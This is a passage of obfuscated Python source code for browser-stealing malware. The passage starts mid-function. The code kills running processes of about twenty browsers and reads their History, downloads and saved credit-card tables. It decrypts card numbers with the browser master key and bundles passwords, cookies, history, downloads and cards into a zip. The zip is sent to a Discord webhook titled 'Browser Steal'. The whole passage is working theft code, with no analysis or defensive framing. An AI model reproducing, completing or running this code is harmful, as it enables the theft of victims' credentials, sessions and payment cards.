        UEZSVNGCFLILZCPBCQCOUGFBKLOXMVSGIUPIENEISIBRFTHMCEAYHVIDULFCHOVXUJSTNQEIMUHVBUFMRFQVCHDWGDCBPWA = os.path.join(JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, 'History')
        if not os.path.exists(UEZSVNGCFLILZCPBCQCOUGFBKLOXMVSGIUPIENEISIBRFTHMCEAYHVIDULFCHOVXUJSTNQEIMUHVBUFMRFQVCHDWGDCBPWA):
            return
        
        ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO = sqlite3.connect(":memory:")
        disk_conn = sqlite3.connect(UEZSVNGCFLILZCPBCQCOUGFBKLOXMVSGIUPIENEISIBRFTHMCEAYHVIDULFCHOVXUJSTNQEIMUHVBUFMRFQVCHDWGDCBPWA)
        disk_conn.backup(ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO)
        disk_conn.close()
        SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO = ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO.cursor()
        SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO.execute('SELECT url, title, last_visit_time FROM urls')

        for v4r_row in SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO.fetchall():
            if not v4r_row[0] or not v4r_row[1] or not v4r_row[2]:
                continue
            UFEDUUBTJTRIIQMMSGUKKFYRAEYNQEBQLURZPJDLLISWONESLVRXWWOLUYGWQYASGFJISHLTMDFLYGDONZCBWTVBWFCYX =          f"- Url     : {v4r_row[0]}"
            NXEOUEXBGAXYWHONJGGTWLMGGVPUZZCBMHJVIGBZIFFGNPGNSZEAMXDBUPELURNOIWKUIKSUYSVPAGNSQMCROVILMVOXLJNGHE =        f"  Title   : {v4r_row[1]}"
            YSYLCWEJNJLEOMINPEFLIZTZQKBGMATTCVFCVPDPRRXOMLSIYLWSGUTJOQXVZKKEWHCNYEJGVNLKXJYXVEYRLDUIZOWWE =         f"  Time    : {v4r_row[2]}"
            QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS_name = f"  Browser : {QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS}"
            QWZPQRAUHNYURDUVCOYHETJNVGSQWLEBRMDNONJSCISHMEVVHJCTNLONISNPGFS.append(f"{UFEDUUBTJTRIIQMMSGUKKFYRAEYNQEBQLURZPJDLLISWONESLVRXWWOLUYGWQYASGFJISHLTMDFLYGDONZCBWTVBWFCYX}\n{NXEOUEXBGAXYWHONJGGTWLMGGVPUZZCBMHJVIGBZIFFGNPGNSZEAMXDBUPELURNOIWKUIKSUYSVPAGNSQMCROVILMVOXLJNGHE}\n{YSYLCWEJNJLEOMINPEFLIZTZQKBGMATTCVFCVPDPRRXOMLSIYLWSGUTJOQXVZKKEWHCNYEJGVNLKXJYXVEYRLDUIZOWWE}\n{QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS_name}\n")

        ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO.close()

    def VNPVKKLYSGOTDOJMVWOQUYLPOFPYDDUHKYVLMPDDLINKOZJXGHTQKLTTLLVHPIBOBWBTLAQKQ(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW):
        YILNZVTGCGHXHRJUYNBUOMKJUDPSIHYPVBXOMVFAIHDVBKRFXEQIPDLHTVJFKCNTRDBWCROHQCKBMORATTCBMLPAIHNNR = os.path.join(JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, 'History')
        if not os.path.exists(YILNZVTGCGHXHRJUYNBUOMKJUDPSIHYPVBXOMVFAIHDVBKRFXEQIPDLHTVJFKCNTRDBWCROHQCKBMORATTCBMLPAIHNNR):
            return

        ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO = sqlite3.connect(":memory:")
        disk_conn = sqlite3.connect(YILNZVTGCGHXHRJUYNBUOMKJUDPSIHYPVBXOMVFAIHDVBKRFXEQIPDLHTVJFKCNTRDBWCROHQCKBMORATTCBMLPAIHNNR)
        disk_conn.backup(ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO)
        disk_conn.close()
        SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO = ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO.cursor()
        SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO.execute('SELECT tab_url, target_path FROM downloads')
        for row in SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO.fetchall():
            if not row[0] or not row[1]:
                continue
            EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX =         f"- Path    : {row[1]}"
            UFEDUUBTJTRIIQMMSGUKKFYRAEYNQEBQLURZPJDLLISWONESLVRXWWOLUYGWQYASGFJISHLTMDFLYGDONZCBWTVBWFCYX =          f"  Url     : {row[0]}"
            QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS_name = f"  Browser : {QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS}"
            NBYAPYMWIGBNOPXDVEXHGBZZYZYQSCJTXFINKVHXEYVKAGGJVCNEGZBKDWKAHD.append(f"{EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX}\n{UFEDUUBTJTRIIQMMSGUKKFYRAEYNQEBQLURZPJDLLISWONESLVRXWWOLUYGWQYASGFJISHLTMDFLYGDONZCBWTVBWFCYX}\n{QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS_name}\n")

        ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO.close()

    def IFWBXAWGYHHPLHTPWDFQMDZAMLPVNTGJSWZOCUUSODGCYCMXOKLSATQIQHNRKLNHUMKJLYHZOWGZKTKMYBNILKWVDDCY(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC):
        DYWNSKAIBJENUENVWJVLBRXFVXVGPDEVJUFWLALBTERIVGLGICVDWW = os.path.join(JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, 'Web Data')
        if not os.path.exists(DYWNSKAIBJENUENVWJVLBRXFVXVGPDEVJUFWLALBTERIVGLGICVDWW):
            return

        ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO = sqlite3.connect(":memory:")
        disk_conn = sqlite3.connect(DYWNSKAIBJENUENVWJVLBRXFVXVGPDEVJUFWLALBTERIVGLGICVDWW)
        disk_conn.backup(ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO)
        disk_conn.close()
        SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO = ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO.cursor()
        SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO.execute('SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted, date_modified FROM credit_cards')

        for v4r_row in SCJAXIBYOBDBFXPOQAZHVKOJJEFBSZPPRHLOVKBVTUQXZRJCAJQAZRSDMVO.fetchall():
            if not v4r_row[0] or not v4r_row[1] or not v4r_row[2] or not v4r_row[3]:
                continue
            HLVVZSMONUAXWWDKYDBXZOAZDQZTFAEUWQHAIDCEAVQPWPBIJYEHUX =             f"- Name             : {v4r_row[0]}"
            JSQPNGIPZEHOVSLDVFGOAMDMSJKROHDNNZHKXHCVLGWVXKPBNXPHWC = f"  Expiration Month : {v4r_row[1]}"
            GITBBNOKDDOZKMOEVXJOOWOAXOOGQKJXVJKSLHPGJYMHVTSGDKKGBZYTKYSMGRPBTYHGZMLASJQMCVDZYHSWVNTUQ =  f"  Expiration Year  : {v4r_row[2]}"
            CPOGDDFZQWSMGVYDXYKNBWOBRKFNYIMUFQUAKZQZIEQSLHPQGHXU =      f"  Card Number      : {GMWXGREKPZWUWWSEBSHCSCYJXDIHXECSIXOPGPAZEABVQIYCMPFPMHGSPRXKEOEQIPHLWOFFMCXQCLJFTDASDFQZCBTTYDK(v4r_row[3], QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC)}"
            KIITIOOPNHDQMYJUGUHBVEELRCUURBEMGZNTVPUPXEKPPNHHEUVUXBXVUPCOYXSLQGGZBZWXWWQAFZWEQBCZNLTOQYESX =    f"  Date Modified    : {v4r_row[4]}"
            QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS_name =     f"  Browser          : {QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS}"
            ZSHFZAUIFSZNJZSVDWUGRPXQVXNBZMPOCRKMTGGNZVGAJINOZUOMYCMZLM.append(f"{HLVVZSMONUAXWWDKYDBXZOAZDQZTFAEUWQHAIDCEAVQPWPBIJYEHUX}\n{JSQPNGIPZEHOVSLDVFGOAMDMSJKROHDNNZHKXHCVLGWVXKPBNXPHWC}\n{GITBBNOKDDOZKMOEVXJOOWOAXOOGQKJXVJKSLHPGJYMHVTSGDKKGBZYTKYSMGRPBTYHGZMLASJQMCVDZYHSWVNTUQ}\n{CPOGDDFZQWSMGVYDXYKNBWOBRKFNYIMUFQUAKZQZIEQSLHPQGHXU}\n{KIITIOOPNHDQMYJUGUHBVEELRCUURBEMGZNTVPUPXEKPPNHHEUVUXBXVUPCOYXSLQGGZBZWXWWQAFZWEQBCZNLTOQYESX}\n{QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS_name}\n")
        
        ZZLHHZBFWILSPDCLTUTXXTHKSADDYSUGKTCDNSUTPRTTUAMENJXMALWOQYDJFCQJKO.close()

    def FTMDVPBMROASWNXUKXEYJUJSFXGXAJPAKKSSBNVLIOZNQDQRBDHYZOXYDOSTTXWGNZDVGQHREZMVGVGPAOHVUFG(DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM):
        files_in_memory = {}

        if QNZJZLKYPRHABOTORVKSQLPIJQIWWWTTFSULPFCSCPTVITMNYZNOXLNXWZOCFHPXIEQCUHIGOJHHOVNOCWU:
            files_in_memory[f"Passwords_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.txt"] = '\n'.join(QNZJZLKYPRHABOTORVKSQLPIJQIWWWTTFSULPFCSCPTVITMNYZNOXLNXWZOCFHPXIEQCUHIGOJHHOVNOCWU)

        if KMNKMTMXDIJXDZNNWDNHHYYELHKVBSPAHOVSNKVYPEQZKDSCZKCTOAVNJ:
            files_in_memory[f"Cookies_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.txt"] = '\n'.join(KMNKMTMXDIJXDZNNWDNHHYYELHKVBSPAHOVSNKVYPEQZKDSCZKCTOAVNJ)

        if QWZPQRAUHNYURDUVCOYHETJNVGSQWLEBRMDNONJSCISHMEVVHJCTNLONISNPGFS:
            files_in_memory[f"History_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.txt"] = '\n'.join(QWZPQRAUHNYURDUVCOYHETJNVGSQWLEBRMDNONJSCISHMEVVHJCTNLONISNPGFS)

        if NBYAPYMWIGBNOPXDVEXHGBZZYZYQSCJTXFINKVHXEYVKAGGJVCNEGZBKDWKAHD:
            files_in_memory[f"Downloads_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.txt"] = '\n'.join(NBYAPYMWIGBNOPXDVEXHGBZZYZYQSCJTXFINKVHXEYVKAGGJVCNEGZBKDWKAHD)

        if ZSHFZAUIFSZNJZSVDWUGRPXQVXNBZMPOCRKMTGGNZVGAJINOZUOMYCMZLM:
            files_in_memory[f"Cards_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.txt"] = '\n'.join(ZSHFZAUIFSZNJZSVDWUGRPXQVXNBZMPOCRKMTGGNZVGAJINOZUOMYCMZLM)

        zip_in_memory = io.BytesIO()
        with zipfile.ZipFile(zip_in_memory, 'w', zipfile.ZIP_DEFLATED) as zipf:
            for filename, file_content in files_in_memory.items():
                zipf.writestr(filename, file_content)
        
        zip_in_memory.seek(0)
        return zip_in_memory

    def KWLMQQBLQLMWXCIQLPBBXYKYYQZBZZHVTUERBFHYBQHICTFTAZDXQNOF(DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM, zip_in_memory):
        LSDSXBVVQABFIKQQUROBYVROAYRIFOSMEWFSEPVWRCILIPSKYMVYLD = SyncWebhook.from_url(NHSKJFRUVKXRLJYQCBLZETDMSIWVOJNTRKZFTNPGMSBSMYCZZYWUSGLCUWDC)
        LSDSXBVVQABFIKQQUROBYVROAYRIFOSMEWFSEPVWRCILIPSKYMVYLD.send(
            embed=Embed(
                title=f'Browser Steal {MWJPQONMDCWWSTSYPOTJPVUFMBPBJWRWZTRWUZVVMTUSUGCHZGOUBCBAAMISRONFYIYOLJXRJRQAZIEZLIECVRWOYD}:',
                description=f"Found In **{'**, **'.join(EMMKHTOVPYVCXUSXOKKYCOPYJAXVUCVUKAMLIPACPVOKMNMBERHLVCOOHWSYWVJZJKCUNQQDUPQSCEZMRUKS)}**: ```📂 - Browser_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.zip\n├── 📄 - Cards_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.txt\n├── 📄 - Cookies_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.txt\n├── 📄 - Downloads_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.txt\n├── 📄 - History_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.txt\n└── 📄 - Passwords_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.txt```",
                color=DTTKKKCYSVPJWFZWSMVDSHBOCYYDWPXYKJLOEMZITPMEDXUIABQDQJAMCAJJTWWYCGOMWNGNAAGKYJJERTCBFJZSEDQUDSNZQH,
            ).set_footer(
                text=CTYDDRKFZDARVGPASDBJAPLJRUHHJJLJWOROLAERPRXWPAMLKXMNBHIKYFMREUOPOSIEMV,
                icon_url=PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR
            ),
            file=File(fp=zip_in_memory, filename=f"Browser_{DXQDIBYVLSTKKYLCEXTOFOCYZGMIRFHADOBWKNIFOCRBVTVYKDZHAVEAPVFPSJEOIIDQQVNIWAAIM}.zip"), 
            username=QXYCEYRPXWXWGTCQFAGKQNDQWVQARSQYWBPRBZYQLDVIQEFWIOJLGRBELHZIIKDZQX, avatar_url=PHQQIXYNVPUVECRVBOYOXUJXTZDRKYJLMHJPQHKMHSHJZRCCQBSCOEKODELQYYFEMDUTXZOFIIFAQFCR
        )
        
    XYLYHISAIOQBKKQWWFDVNVQSEEALVFHTHRDMOYGSTKABSKMCBZVS = {
        'Google Chrome': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Google', 'Chrome', 'User Data'),
        'Microsoft Edge': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Microsoft', 'Edge', 'User Data'),
        'Opera': os.path.join(RGFISSDXDJMUPUFVDUUVRWCGTOQIRXXMFJPDHKYKGDQYHICNFCWANUPNCEAWQVNKRRVLWEARNOWGD, 'Opera Software', 'Opera Stable'),
        'Opera GX': os.path.join(RGFISSDXDJMUPUFVDUUVRWCGTOQIRXXMFJPDHKYKGDQYHICNFCWANUPNCEAWQVNKRRVLWEARNOWGD, 'Opera Software', 'Opera GX Stable'),
        'Brave': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'BraveSoftware', 'Brave-Browser', 'User Data'),
        'Vivaldi': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Vivaldi', 'User Data'),
        'Internet Explorer': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Microsoft', 'Internet Explorer'),
        'Amigo': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Amigo', 'User Data'),
        'Torch': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Torch', 'User Data'),
        'Kometa': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Kometa', 'User Data'),
        'Orbitum': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Orbitum', 'User Data'),
        'Cent Browser': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'CentBrowser', 'User Data'),
        '7Star': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, '7Star', '7Star', 'User Data'),
        'Sputnik': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Sputnik', 'Sputnik', 'User Data'),
        'Google Chrome SxS': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Google', 'Chrome SxS', 'User Data'),
        'Epic Privacy Browser': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Epic Privacy Browser', 'User Data'),
        'Uran': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'uCozMedia', 'Uran', 'User Data'),
        'Yandex': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Yandex', 'YandexBrowser', 'User Data'),
        'Iridium': os.path.join(CMWYTCLJZBZSSCREYECVPASTELCWABFQVDQWPSGMWVBNCLBIQUAEOEOZAXXQAQMWMRSQEGZXXDPDNOVGHDMYEJSELAGBPGRMZ, 'Iridium', 'User Data'),
        'Mozilla Firefox': os.path.join(RGFISSDXDJMUPUFVDUUVRWCGTOQIRXXMFJPDHKYKGDQYHICNFCWANUPNCEAWQVNKRRVLWEARNOWGD, 'Mozilla', 'Firefox', 'Profiles'),
        'Safari': os.path.join(RGFISSDXDJMUPUFVDUUVRWCGTOQIRXXMFJPDHKYKGDQYHICNFCWANUPNCEAWQVNKRRVLWEARNOWGD, 'Apple Computer', 'Safari'),
    }

    XYLYHISAIOQBKKQWWFDVNVQSEEALVFHTHRDMOYGSTKABSKMCBZVS_Processes = {
        'Google Chrome': 'chrome.exe',
        'Microsoft Edge': 'msedge.exe',
        'Opera': 'opera.exe',
        'Opera GX': 'opera.exe',
        'Brave': 'brave.exe',
        'Vivaldi': 'vivaldi.exe',
        'Internet Explorer': 'iexplore.exe',
        'Amigo': 'amigo.exe',
        'Torch': 'torch.exe',
        'Kometa': 'kometa.exe',
        'Orbitum': 'orbitum.exe',
        'Cent Browser': 'centbrowser.exe',
        '7Star': '7star.exe',
        'Sputnik': 'sputnik.exe',
        'Google Chrome SxS': 'chrome.exe',
        'Epic Privacy Browser': 'epic.exe',
        'Uran': 'uran.exe',
        'Yandex': 'yandex.exe',
        'Iridium': 'iridium.exe',
        'Mozilla Firefox': 'firefox.exe',
        'Safari': 'safari.exe',
    }
        
    KBCHGKXMUDWJUMPQGWJCMODATNVTLLKHMINBZHBZDNAYPVBTJSUNAGCGYVTKRT = [
        '', 'Default', 'Profile 1', 'Profile 2', 'Profile 3', 'Profile 4', 'Profile 5'
    ]

    try:
        for browser, proc_name in XYLYHISAIOQBKKQWWFDVNVQSEEALVFHTHRDMOYGSTKABSKMCBZVS_Processes.items():
            for proc in psutil.process_iter(['pid', 'name']):
                try:
                    if proc.name().lower() == proc_name.lower():
                        proc.terminate()
                except: pass
    except: pass

    for QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX in XYLYHISAIOQBKKQWWFDVNVQSEEALVFHTHRDMOYGSTKABSKMCBZVS.items():
        if not os.path.exists(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX):
            continue

        QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC = YUUYGVFFBXVUIKROSBXVJIEMBKYEGPXJMRBYOVUXUCROMBHSJVCVPETUJISZYALVEXUCABR(os.path.join(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX, 'Local State'))
        if not QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC:
            continue

        for v4r_profile in KBCHGKXMUDWJUMPQGWJCMODATNVTLLKHMINBZHBZDNAYPVBTJSUNAGCGYVTKRT:
            JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW = os.path.join(EHHABVISOCOEPPRNHPGUDIMACUAZKGHTUDYWZMBAUYYTPTOBMAWLCIDHAIOJBILOZLUX, v4r_profile)
            if not os.path.exists(JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW):
                continue
            
            try: UPNEMFWVLRGMMTCUZPNGYEPRIMYPFWCVVSCLDTCNGVMABBVAYEPIKJKZRTRPEM(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC)
            except: pass
            try: LPAJTXYGIGROESELFCDHRPGCDAPMTRGOKBKWFQNTQCRBOGEAWURVRKJGGRVTABBHC(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC)
            except: pass
            try: WDFJFBTEZADXBTLNUYHRXJTQMJPGQMOOJNXPMHGCMKCPHXPAURVXUSCSFAMUWYWPHSWMWXLZFAEXIQYCCXYN(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW)
            except: pass
            try: VNPVKKLYSGOTDOJMVWOQUYLPOFPYDDUHKYVLMPDDLINKOZJXGHTQKLTTLLVHPIBOBWBTLAQKQ(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW)
            except: pass
            try: IFWBXAWGYHHPLHTPWDFQMDZAMLPVNTGJSWZOCUUSODGCYCMXOKLSATQIQHNRKLNHUMKJLYHZOWGZKTKMYBNILKWVDDCY(QOJHVDWTOHNBAXRWNXPWPEAHRAEMAECDITSWCIWRSKZPNEORZERVPCORUUDLDYZABCPWCLTSRDWGZMVAVELREOQNYDUYPGS, JEZCFVYPNAXMNFXJQQOHVZSTYPLSVFUKUDFYRWCDELIBXBCQQMYNOTILDW, QXMFQKPCHFEVSOUQIOAPTCGOSIJCNROXEZLRHMTKAKNGZEWWQYIMAKZUJZANNC)
            except: pass

